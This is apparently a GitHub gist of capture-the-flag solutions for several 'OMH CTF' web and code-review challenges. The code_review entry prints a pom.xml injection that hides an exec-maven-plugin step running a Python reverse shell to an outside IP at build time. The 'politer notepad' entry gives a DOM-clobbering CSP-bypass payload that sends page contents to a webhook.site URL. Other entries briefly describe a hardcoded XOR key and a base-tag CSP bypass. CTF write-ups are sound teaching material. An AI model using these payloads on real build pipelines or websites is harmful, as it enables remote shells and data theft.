Skip to content

Instantly share code, notes, and snippets.

@msrkp

msrkp/sol.md

Last active May 16, 2021 13:36
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save msrkp/2d0eb8eb292e1d05e064921f9e871794 to your computer and use it in GitHub Desktop.
Save msrkp/2d0eb8eb292e1d05e064921f9e871794 to your computer and use it in GitHub Desktop.
Download ZIP
OMH CTF Solutions
Raw
sol.md

code_review solution

Add comment in text node of plugin configuration in pom.xml file. This comment will add new plugin and executes reverse shell

<plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-surefire-plugin</artifactId>
                <version>2.22.2</version>
                <configuration> // <forkedProcessTimeoutInSeconds>30</forkedProcessTimeoutInSeconds></configuration></plugin>
 <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <version>1.3.2</version>
                <executions>
                <execution>
                    <id>s1r1us</id>
                    <goals>
                    <goal>exec</goal>
                    </goals>
                    <phase>initialize</phase>
                    <configuration>
                    <executable>python</executable>
                    <arguments>
                        <argument>-c</argument>
                        <argument>import sys,socket,os,pty;s=socket.socket();s.connect(("123.12.12.123",1337));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")</argument>
                    </arguments>
                    </configuration>
                </execution>
            </executions>
            </plugin></plugins></build></project><!--
                    <forkedProcessTimeoutInSeconds>30</forkedProcessTimeoutInSeconds>
                </configuration>
            </plugin>
        </plugins>
    </build>
</project> // -->

remote_reports

Post data is transmitted with the XOR of 'szefuSecurePassword2021'. Decrypt data and you can notice a method named getUsersDev which gives password to admin.

polite notepad

CSP can be bypassed by adding base tag

politer notepad

This is a nice puzzle, using dom clobbering we manipulate DOM and add nonce to our script tag. I got first blood for this challenge. Add below html as note.

 <pwning urll>ends
        st98

        <base href=a:abc><a id=good1 href="https://ctf.s1r1us.ninja/static/badwords.js?">ad</a>
        <a id=bad1 href="urll">ab</a>
        <base href=a:abc><a id=good3 href=">fetch('http://politernotepad.zajebistyc.tf/').then(x=>x.text()).then(x=>{a=btoa(encodeURIComponent(x));location='https://webhook.site/2b34b951-cc1a-4c17-b48b-bc5dc1faf52f?a='+a})//">ad</a>
        <a id=bad3 href="src= https://ctf.s1r1us.ninja/static/badwords.js">ab</a>
        <base href=a:abc><a id=good4 href="</script>">ad</a>
        <a id=bad4 href="ends">ab</a>
        <base href=a:abc><a id=bad2 href="<pwning">ad</a>
        <a id=good2 href="

Final note looks like below

<html>
<head>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-wEmeIV1mKuiNpC+IOBjI7aAzPcEZeedi5yW5f2yOq55WWLwNGmvvx4Um1vskeMj0" crossorigin="anonymous">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <title>Note</title>
</head>
<body>
<body>

      <div id="content">
           <pwning urll>ends
        st98

        <base href=a:abc><a id=good1 href="https://ctf.s1r1us.ninja/static/badwords.js?">ad</a>
        <a id=bad1 href="urll">ab</a>
        <base href=a:abc><a id=good3 href=">fetch('http://politernotepad.zajebistyc.tf/').then(x=>x.text()).then(x=>{a=btoa(encodeURIComponent(x));location='https://webhook.site/2b34b951-cc1a-4c17-b48b-bc5dc1faf52f?a='+a})//">ad</a>
        <a id=bad3 href="src= https://ctf.s1r1us.ninja/static/badwords.js">ab</a>
        <base href=a:abc><a id=good4 href="</script>">ad</a>
        <a id=bad4 href="ends">ab</a>
        <base href=a:abc><a id=bad2 href="<pwning">ad</a>
        <a id=good2 href="
    </div>
    <script nonce=oNl8FB0B_pDXSnjjRlaf-Q src="http://politernotepad.zajebistyc.tf/static/badwords.js" integrity="sha384-1UV2mnC+iV6gBvv4glb0sAC2atcScwkpEzz5GN3WmVgok8MckQ1yn74acklRk0uo">
    </script>
    <script nonce=oNl8FB0B_pDXSnjjRlaf-Q>
      console.log(1)
        var footer = 'if you see anything impolite in this page please <a href="'+document.referrer+'">go back</a>';
        footer = '<div>'+footer+'</div>';
 
        content = $('#content').html();
        content += footer;
        content = content.replaceAll(bad1, good1);
        content = content.replaceAll(bad2, good2);
        content = content.replaceAll(bad3, good3);
        content = content.replaceAll(bad4, good4);
	console.log(content);
        $('#content').html(content);
    </script>
</div>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment